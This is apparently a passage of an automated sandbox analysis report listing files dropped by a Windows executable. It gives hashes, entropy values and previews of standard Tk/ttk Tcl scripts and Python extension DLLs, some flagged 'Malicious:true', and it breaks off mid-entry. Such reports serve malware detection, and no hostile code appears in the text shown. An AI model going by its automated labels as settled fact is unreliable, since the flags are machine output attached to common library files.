                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Bindings for TScrollbar widget.#..# Still don't have a working ttk::scrollbar under OSX -.# Swap in a [tk::scrollbar] on that platform,.# unless user specifies -class or -style..#.if {[tk windowingsystem] eq "aqua"} {. rename ::ttk::scrollbar ::ttk::_scrollbar. proc ttk::scrollbar {w args} {..set constructor ::tk::scrollbar..foreach {option _} $args {.. if {$option eq "-class" || $option eq "-style"} {...set constructor ::ttk::_scrollbar...break.. }..}..return [$constructor $w {*}$args]. }.}..namespace eval ttk::scrollbar {. variable State. # State(xPress).--. # State(yPress).-- initial position of mouse at start of drag.. # State(first).-- value of -first at start of drag..}..bind TScrollbar <ButtonPress-1> .{ ttk::scrollbar::Press %W %x %y }.bind TScrollbar <B1-Motion>..{ ttk::scrollbar::Drag %W %x %y }.bind TScrollbar <ButtonRelease-1>.{ ttk::scrollbar::Release %W %x %y }..bind TScrollbar <ButtonPress-2> .{ ttk::scrollbar::Jump %W %x %y }.bind TScrollb

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\sizegrip.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2392
                                                                                                                                                                                                                                                    Entropy (8bit):4.778050320627444
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:KqL4L1BItZ3EZEhHR4vuRbMMie8GMW/H7vZZNQdqrYfy2nL+ZZvBb:KDhBIjHHRmiM1qvbnNQdqriyQIvB
                                                                                                                                                                                                                                                    MD5:BD1F47CE81C8690462B050CED53A6817
                                                                                                                                                                                                                                                    SHA1:318EB1F966A7E04E75F376D5D748E80A68E99A13
                                                                                                                                                                                                                                                    SHA-256:ED31FA0B0D3438ACAD3384DDE1E562033E0D9A035E5056322DA219D6C4CBD912
                                                                                                                                                                                                                                                    SHA-512:7BDF0438806A2962B553F9062077522BD03EED1088B7D66C652920786A10D19897F263C195AAA6E29023D9BC69C33BBEF189CE082A2DCD2611336448E5CBD87D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Sizegrip widget bindings..#.# Dragging a sizegrip widget resizes the containing toplevel..#.# NOTE: the sizegrip widget must be in the lower right hand corner..#..switch -- [tk windowingsystem] {. x11 -. win32 {..option add *TSizegrip.cursor [ttk::cursor seresize]. }. aqua {. .# Aqua sizegrips use default Arrow cursor.. }.}..namespace eval ttk::sizegrip {. variable State. array set State {..pressed .0..pressX ..0..pressY ..0..width ..0..height ..0..widthInc.1..heightInc.1. resizeX 1. resizeY 1..toplevel .{}. }.}..bind TSizegrip <ButtonPress-1> ..{ ttk::sizegrip::Press.%W %X %Y }.bind TSizegrip <B1-Motion> ..{ ttk::sizegrip::Drag .%W %X %Y }.bind TSizegrip <ButtonRelease-1> .{ ttk::sizegrip::Release %W %X %Y }..proc ttk::sizegrip::Press {W X Y} {. variable State.. if {[$W instate disabled]} { return }.. set top [winfo toplevel $W].. # If the toplevel is not resizable then bail. foreach {State(resizeX) State(resi

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\spinbox.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4255
                                                                                                                                                                                                                                                    Entropy (8bit):4.9576194953603006
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:17n+wMf6/ocy2nO6lz+Ni2QQ0Q3LqSFLfhrxJSS3hQb:ln+wMOxVlaNi2QQ0QbdFLfhrxJzhQb
                                                                                                                                                                                                                                                    MD5:86BCA3AB915C2774425B70420E499140
                                                                                                                                                                                                                                                    SHA1:FD4798D79EEBA9CFFABCB2548068591DB531A716
                                                                                                                                                                                                                                                    SHA-256:51F8A6C772648541684B48622FFE41B77871A185A8ACD11E9DEC9EC41D65D9CD
                                                                                                                                                                                                                                                    SHA-512:659FB7E1631ED898E3C11670A04B953EB05CECB42A3C5EFBDD1BD97A7F99061920FD5DB3915476F224BB2C72358623E1B474B0FC3FBB7FD3734487B87A388FD7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# ttk::spinbox bindings.#..namespace eval ttk::spinbox { }..### Spinbox bindings..#.# Duplicate the Entry bindings, override if needed:.#..ttk::copyBindings TEntry TSpinbox..bind TSpinbox <Motion>...{ ttk::spinbox::Motion %W %x %y }.bind TSpinbox <ButtonPress-1> ..{ ttk::spinbox::Press %W %x %y }.bind TSpinbox <ButtonRelease-1> .{ ttk::spinbox::Release %W }.bind TSpinbox <Double-Button-1> .{ ttk::spinbox::DoubleClick %W %x %y }.bind TSpinbox <Triple-Button-1> .{} ;# disable TEntry triple-click..bind TSpinbox <KeyPress-Up>..{ event generate %W <<Increment>> }.bind TSpinbox <KeyPress-Down> ..{ event generate %W <<Decrement>> }..bind TSpinbox <<Increment>>..{ ttk::spinbox::Spin %W +1 }.bind TSpinbox <<Decrement>> ..{ ttk::spinbox::Spin %W -1 }..ttk::bindMouseWheel TSpinbox ..[list ttk::spinbox::MouseWheel %W]..## Motion --.#.Sets cursor..#.proc ttk::spinbox::Motion {w x y} {. if { [$w identify $x $y] eq "textarea". && [$w instate {!readonly !disabled}]. } {..ttk::setCurso

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\treeview.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8863
                                                                                                                                                                                                                                                    Entropy (8bit):4.859904243190413
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:2Ou002W8wZ4sNNxjKomA3xj9L/37NbbFqG4eeMxCSbk3TPMrngEibSB1GjwPBKse:ZW8+Z5BDX+DsXibSQUMHLCGLdE2bZ
                                                                                                                                                                                                                                                    MD5:9C5111CC62F08184168CA4A78BFAF2A1
                                                                                                                                                                                                                                                    SHA1:7887070F9F66E3899F41A8069EC28B19221DF892
                                                                                                                                                                                                                                                    SHA-256:09C8967608A4C9887F12288C22765161F53016CECF1870CA8D6AEE6ECC4EC1D1
                                                                                                                                                                                                                                                    SHA-512:6EB4290BF3C4C6E06243A3707791582B403E55D072F1D52A494F9E5D77574E0BAB5B91467D1193D77A8F5793481C801F6E41B94DE7BF67282781938D4A4EA90C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# ttk::treeview widget bindings and utilities..#..namespace eval ttk::treeview {. variable State.. # Enter/Leave/Motion. #. set State(activeWidget) .{}. set State(activeHeading) .{}.. # Press/drag/release:. #. set State(pressMode) .none. set State(pressX)..0.. # For pressMode == "resize". set State(resizeColumn).#0.. # For pressmode == "heading". set State(heading) .{}.}..### Widget bindings..#..bind Treeview.<Motion> ..{ ttk::treeview::Motion %W %x %y }.bind Treeview.<B1-Leave>..{ #nothing }.bind Treeview.<Leave>...{ ttk::treeview::ActivateHeading {} {}}.bind Treeview.<ButtonPress-1> .{ ttk::treeview::Press %W %x %y }.bind Treeview.<Double-ButtonPress-1> .{ ttk::treeview::DoubleClick %W %x %y }.bind Treeview.<ButtonRelease-1> .{ ttk::treeview::Release %W %x %y }.bind Treeview.<B1-Motion> ..{ ttk::treeview::Drag %W %x %y }.bind Treeview .<KeyPress-Up> .{ ttk::treeview::Keynav %W up }.bind Treeview .<KeyPress-Down> .{ ttk::treeview::Keynav %

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\ttk.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4546
                                                                                                                                                                                                                                                    Entropy (8bit):4.888987944406022
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:53a25129CKELfMonw+PzpaVnNqovaq2126262R2D2q2k2j+/2FhbtpGt0vcWOQRg:53j5MoKE7JEnN7CTMDDA6Tlj+uFhbttK
                                                                                                                                                                                                                                                    MD5:E38B399865C45E49419C01FF2ADDCE75
                                                                                                                                                                                                                                                    SHA1:F8A79CBC97A32622922D4A3A5694BCCB3F19DECB
                                                                                                                                                                                                                                                    SHA-256:61BAA0268770F127394A006340D99CE831A1C7AD773181C0C13122F7D2C5B7F6
                                                                                                                                                                                                                                                    SHA-512:285F520B648F5EC70DD79190C3B456F4D6DA2053210985F9E2C84139D8D51908296E4962B336894EE30536F09FAE84B912BC2ABF44A7011620F66CC5D9F71A8C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Ttk widget set initialization script..#..### Source library scripts..#..namespace eval ::ttk {. variable library. if {![info exists library]} {..set library [file dirname [info script]]. }.}..source [file join $::ttk::library fonts.tcl].source [file join $::ttk::library cursors.tcl].source [file join $::ttk::library utils.tcl]..## ttk::deprecated $old $new --.#.Define $old command as a deprecated alias for $new command.#.$old and $new must be fully namespace-qualified..#.proc ttk::deprecated {old new} {. interp alias {} $old {} ttk::do'deprecate $old $new.}.## do'deprecate --.#.Implementation procedure for deprecated commands --.#.issue a warning (once), then re-alias old to new..#.proc ttk::do'deprecate {old new args} {. deprecated'warning $old $new. interp alias {} $old {} $new. uplevel 1 [linsert $args 0 $new].}..## deprecated'warning --.#.Gripe about use of deprecated commands..#.proc ttk::deprecated'warning {old new} {. puts stderr "$old deprecated -- u

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\utils.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8562
                                                                                                                                                                                                                                                    Entropy (8bit):4.958950985117383
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:MpEpXI4jqmW/y3gp9F+QE9PBRc+vWHJOfqW8j3ki3LDRdielRu+MXw+:6yXuwg1oPnc+epOEj31/s/5
                                                                                                                                                                                                                                                    MD5:65193FE52D77B8726B75FBF909EE860A
                                                                                                                                                                                                                                                    SHA1:991DEDD4666462DD9776FDF6C21F24D6CF794C85
                                                                                                                                                                                                                                                    SHA-256:C7CC9A15CFA999CF3763772729CC59F629E7E060AF67B7D783C50530B9B756E1
                                                                                                                                                                                                                                                    SHA-512:E43989F5F368D2E19C9A3521FB82C6C1DD9EEB91DF936A980FFC7674C8B236CB84E113908B8C9899B85430E8FC30315BDEC891071822D701C91C5978096341B7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Utilities for widget implementations..#..### Focus management..#.# See also: #1516479.#..## ttk::takefocus --.#.This is the default value of the "-takefocus" option.#.for ttk::* widgets that participate in keyboard navigation..#.# NOTES:.#.tk::FocusOK (called by tk_focusNext) tests [winfo viewable].#.if -takefocus is 1, empty, or missing; but not if it's a.#.script prefix, so we have to check that here as well..#.#.proc ttk::takefocus {w} {. expr {[$w instate !disabled] && [winfo viewable $w]}.}..## ttk::GuessTakeFocus --.#.This routine is called as a fallback for widgets.#.with a missing or empty -takefocus option..#.#.It implements the same heuristics as tk::FocusOK..#.proc ttk::GuessTakeFocus {w} {. # Don't traverse to widgets with '-state disabled':. #. if {![catch {$w cget -state} state] && $state eq "disabled"} {..return 0. }.. # Allow traversal to widgets with explicit key or focus bindings:. #. if {[regexp {Key|Focus} [concat [bind $w] [bind [winfo c

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\vistaTheme.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9349
                                                                                                                                                                                                                                                    Entropy (8bit):4.613570740989389
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:kwsdZzIE2NSCyNPNVVSCIA5l/r5l/rWMi/CE38S7r/2JeJnpna+yfdyMq53ICyzl:sZzL24FVeArPKf3z7cQ0383cdd
                                                                                                                                                                                                                                                    MD5:70EFC208940AB312DF76FDB0A4C16DC2
                                                                                                                                                                                                                                                    SHA1:0AC88DA8B62875D8F7178A3666CD6CFB0E5C27E1
                                                                                                                                                                                                                                                    SHA-256:92D0FC7C0839AB4D1ED3765F6467B824735850167C22C082525BBC81EED6CC3B
                                                                                                                                                                                                                                                    SHA-512:5A16EF33E9061402F88C90ACB2A1A4C607C0606BD8AED3BAB2FBD8F75364E2E49F95118408E8C5A64A124B8D667AA53E689C88C8C498EE04E024D2FCA843A82A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Settings for Microsoft Windows Vista and Server 2008.#..# The Vista theme can only be defined on Windows Vista and above. The theme.# is created in C due to the need to assign a theme-enabled function for .# detecting when themeing is disabled. On systems that cannot support the.# Vista theme, there will be no such theme created and we must not.# evaluate this script...if {"vista" ni [ttk::style theme names]} {. return.}..namespace eval ttk::theme::vista {.. ttk::style theme settings vista {.. .ttk::style configure . \.. -background SystemButtonFace \.. -foreground SystemWindowText \.. -selectforeground SystemHighlightText \.. -selectbackground SystemHighlight \.. -font TkDefaultFont \.. ;...ttk::style map "." \.. -foreground [list disabled SystemGrayText] \.. ;...ttk::style configure TButton -anchor center -padding {1 1} -width -11..ttk::style configure TRadiobutton -padding 2..ttk::style configure TCheckbutton -padding 2..ttk::style configure TMenubu

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\winTheme.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2643
                                                                                                                                                                                                                                                    Entropy (8bit):4.8723234445803545
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:679ahShG0Ds0IXF6yjAfSAfqFRaBgLtei42kt+5Ql/n+iOaVa9LU:6vM0uTk5tm4v
                                                                                                                                                                                                                                                    MD5:A6EFE03AC019E723627C064AC74DCBF3
                                                                                                                                                                                                                                                    SHA1:9740638A19E6B5360FD69D887A4E01D9818FE43B
                                                                                                                                                                                                                                                    SHA-256:08CE1484FF82AE2842A986B5A44EA81CC375E34687EF0896C8A45938721AA265
                                                                                                                                                                                                                                                    SHA-512:8AB802D41522080CFA974B628CFF2BA3BFC074BC0C99DCF0E0AB647D54D10C9293C7B79F842BB5E8767972CD55724C3646065A2E988D7581863AF4CFD5938EB7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Settings for 'winnative' theme..#..namespace eval ttk::theme::winnative {. ttk::style theme settings winnative {...ttk::style configure "." \.. -background SystemButtonFace \.. -foreground SystemWindowText \.. -selectforeground SystemHighlightText \.. -selectbackground SystemHighlight \.. -troughcolor SystemScrollbar \.. -font TkDefaultFont \.. ;...ttk::style map "." -foreground [list disabled SystemGrayText] ;. ttk::style map "." -embossed [list disabled 1] ;...ttk::style configure TButton \.. -anchor center -width -11 -relief raised -shiftrelief 1..ttk::style configure TCheckbutton -padding "2 4"..ttk::style configure TRadiobutton -padding "2 4"..ttk::style configure TMenubutton \.. -padding "8 4" -arrowsize 3 -relief raised...ttk::style map TButton -relief {{!disabled pressed} sunken}...ttk::style configure TEntry \.. -padding 2 -selectborderwidth 0 -insertwidth 1..ttk::style map TEntry \.. -fieldbackground \.. .[list readonly System

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\ttk\xpTheme.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1920
                                                                                                                                                                                                                                                    Entropy (8bit):4.940443388600074
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:NaxYun9ahShk/T5QNt+7aVzEmAf8Afb9AfMML:kq1eb
                                                                                                                                                                                                                                                    MD5:176A5DCEB7CF7A201B517B859F923F42
                                                                                                                                                                                                                                                    SHA1:207D85B0ADB45BBCFEBCAEC9E2633FF353BB6449
                                                                                                                                                                                                                                                    SHA-256:351BA00B3A02748FCE2DF2AB79D0C30C445DEF179005B6D7DB739CE3AA8C1658
                                                                                                                                                                                                                                                    SHA-512:07B4466DBD22067D5E038B09D1EA7F578C817E3B73BCBB1F66533A48B817F8400E01B79F5F5FC2FAC46942F5E0DF98745A52E08F5DE078669D771E3794C01F91
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#.# Settings for 'xpnative' theme.#..namespace eval ttk::theme::xpnative {.. ttk::style theme settings xpnative {...ttk::style configure . \.. -background SystemButtonFace \.. -foreground SystemWindowText \.. -selectforeground SystemHighlightText \.. -selectbackground SystemHighlight \.. -font TkDefaultFont \.. ;...ttk::style map "." \.. -foreground [list disabled SystemGrayText] \.. ;...ttk::style configure TButton -anchor center -padding {1 1} -width -11..ttk::style configure TRadiobutton -padding 2..ttk::style configure TCheckbutton -padding 2..ttk::style configure TMenubutton -padding {8 4}...ttk::style configure TNotebook -tabmargins {2 2 2 0}..ttk::style map TNotebook.Tab \.. -expand [list selected {2 2 2 2}]...# Treeview:..ttk::style configure Heading -font TkHeadingFont..ttk::style configure Treeview -background SystemWindow..ttk::style map Treeview \.. -background [list selected SystemHighlight] \.. -foreground [list selected SystemHighlight

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\unsupported.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):11390
                                                                                                                                                                                                                                                    Entropy (8bit):5.001395733354833
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:1wMv11IDCB7PFPHGosvS6UMn6uPrLBfVcO9MGM/OTMjmrUwrt:pduDLBfrMYMjw3Z
                                                                                                                                                                                                                                                    MD5:A2F80093F3AEEEAD14737CFE254EF4DE
                                                                                                                                                                                                                                                    SHA1:E67FC84CA26BEF5E9913FC4E545141BC914AA1EE
                                                                                                                                                                                                                                                    SHA-256:6212DCA4A797FCEBACE36F8EA2C6A4CE4BC660BA392C0ECB80724807263197F1
                                                                                                                                                                                                                                                    SHA-512:0F8D1DFEFE95F779A145BDC9D0C63D1CF9D8C75C648698C37CBFF71132F4178464B2DEA31909F386AE446E88FD89BCBE335765F2C3577456EA40A9DE24197C5C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# unsupported.tcl --.#.# Commands provided by Tk without official support. Use them at your.# own risk. They may change or go away without notice..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...# ----------------------------------------------------------------------.# Unsupported compatibility interface for folks accessing Tk's private.# commands and variable against recommended usage..# ----------------------------------------------------------------------..namespace eval ::tk::unsupported {.. # Map from the old global names of Tk private commands to their. # new namespace-encapsulated names... variable PrivateCommands . array set PrivateCommands {..tkButtonAutoInvoke..::tk::ButtonAutoInvoke..tkButtonDown...::tk::ButtonDown..tkButtonEnter...::tk::ButtonEnter..tkButtonInvoke...::tk::ButtonInvoke..tkButtonLeave...::tk::ButtonLeave..tkButtonUp...::tk::ButtonUp..tkCancelRepeat...::tk::Canc

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tk\xmfbox.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):25974
                                                                                                                                                                                                                                                    Entropy (8bit):4.919711399379606
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:obPApXi6V2+Bec3iGn7H6HZ1KDRxRcbQ3sd1GkjDo413lK/RIVOMXrSommjiETwZ:orAZTunc3sd1GkF3cIVUx01w
                                                                                                                                                                                                                                                    MD5:1C9F8E939F67CAF0512A340D24783680
                                                                                                                                                                                                                                                    SHA1:B6182C5FD9C4FA582AB23B3FF70D93265BD55F35
                                                                                                                                                                                                                                                    SHA-256:42BA98733AE5CE3495D44199CDA5308064E1B46C898A55C6DFA24BE02B06BD81
                                                                                                                                                                                                                                                    SHA-512:6D4D3536B436CFE3792FD0D912FCB21BBD80CCEE577302B1CFAB5029E765EEFD5A98674D5FBE798BC7750D2F9B8C4FD794C5F4D19E0A18CFADC2DFB6D0AC0890
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# xmfbox.tcl --.#.#.Implements the "Motif" style file selection dialog for the.#.Unix platform. This implementation is used only if the.#."::tk_strictMotif" flag is set..#.# Copyright (c) 1996 Sun Microsystems, Inc..# Copyright (c) 1998-2000 Scriptics Corporation.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...namespace eval ::tk::dialog {}.namespace eval ::tk::dialog::file {}...# ::tk::MotifFDialog --.#.#.Implements a file dialog similar to the standard Motif file.#.selection box..#.# Arguments:.#.type.."open" or "save".#.args..Options parsed by the procedure..#.# Results:.#.When -multiple is set to 0, this returns the absolute pathname.#.of the selected file. (NOTE: This is not the same as a single.#.element list.).# .#.When -multiple is set to > 0, this returns a Tcl list of absolute.# pathnames. The argument for -multiple is ignored, but for consistency.# with Windows it defines the ma

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\unicodedata.pyd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):687104
                                                                                                                                                                                                                                                    Entropy (8bit):5.428887209456378
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:Qs363AxoMPBt8FpQsVdFiI5mZMPXubUxktwd:d3oxM8XQsVdXSPAxLd
                                                                                                                                                                                                                                                    MD5:A46E180E03AB5C2D802B8E6214067500
                                                                                                                                                                                                                                                    SHA1:5DE5EFBCE2E6E81B6B954B843090B387B7BA927E
                                                                                                                                                                                                                                                    SHA-256:689E5061CEFDA6223477A6A05906A500D59BD1B2A7458730B8D43C9D3B43BDBA
                                                                                                                                                                                                                                                    SHA-512:68BD7AE714FB4F117EB53A0FB968083772AAEAA6428AE8510E5C109361B140C98415A1955FCA49DB3E9E1B6AE19909E9C50110F499306476D01141C479C16335
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{H..?).?).?).6QE.=).6QS.1).6QT.=).6QC.8).?)..).6QY.>).6QB.>).6QA.>).Rich?).................PE..L......^...........!.....(...R.......0.......@............................................@.........................pX..R...LR..P................................... A..............................@Q..@............@...............................text... &.......(.................. ..`.rdata.......@.......,..............@..@.data....+...`...*...F..............@....reloc..,............p..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\win32api.pyd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):100864
                                                                                                                                                                                                                                                    Entropy (8bit):6.566092703362159
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:eiWTWf6dvDiNGqW3iJqwzmufh+HcuVhV3LHhBNIxJ2cUQM2peoNci7Oahh:ZWT9dvDiNG1yJqwzmuUHcuVhVxcUQMEh
                                                                                                                                                                                                                                                    MD5:C8311157B239363A500513B04D1F6817
                                                                                                                                                                                                                                                    SHA1:791D08F71C39BB01536F5E442F07AC7A0416B8A7
                                                                                                                                                                                                                                                    SHA-256:7DE358652C1732CAF72F968A664301E256AAE281003DDCB0F5ECEF4B13101009
                                                                                                                                                                                                                                                    SHA-512:AB9DADD65C582F2B12AF49448FA4F5A96DA00ABCC257722331AC7E9CAD2E2770FDB7A0F2DB32C113F2DF33E6C84C8C0D594A36F1FB4F3A9CCDB8F3DC1DDFBDBF
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[-..L...L...L.......L.......L.......L...J..L...L..TM.......L.......L.......L..Rich.L..........PE..L....k.^...........!................................................................................................ h..~....C..........@.......................$...p................................@..@...............H....B..@....................text...:........................... ..`.rdata...x.......z..................@..@.data........p.......V..............@....rsrc...@............f..............@..@.reloc..~........ ...j..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\win32event.pyd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):18432
                                                                                                                                                                                                                                                    Entropy (8bit):6.091954091448561
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:H6ObLkEVhuSRk78FF0/ThAdbF7Epmn+W5D+TwGgjRSHQ3b5yvL:1bLkEV4SBF0/ThAdbF7Epm+oD+TwGgjq
                                                                                                                                                                                                                                                    MD5:9875CD79CFB4137EF4B97407141A407F
                                                                                                                                                                                                                                                    SHA1:499EF019C4D10D2F9C86B7E335D723BD35B96123
                                                                                                                                                                                                                                                    SHA-256:A9E176DF950BA410AC34C2E92BF09A6C046EB91C7AD002D6B5F7BEF60F0A4161
                                                                                                                                                                                                                                                    SHA-512:1FB0BA196A00CA6A0A1A6E57667F460C2B8CA00BC7CE6363E066F24840EC9208A40140CED60802CDB28F1B621F490C84C89F5089F5C2985A4F3FD494DDAB590E
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........k..{8..{8..{8..8..{8..8..{8..8..{8 ..8..{8..z8..{8..8..{8..8..{8..8..{8Rich..{8................PE..L....j.^...........!....."...".......+.......@.......................................................................S..P...LJ..x....p..@............................A..............................(I..@............@..`............................text....!.......".................. ..`.rdata.. ....@.......&..............@..@.data........`.......<..............@....rsrc...@....p.......>..............@..@.reloc...............B..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\win32process.pyd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):39424
                                                                                                                                                                                                                                                    Entropy (8bit):6.341139354476684
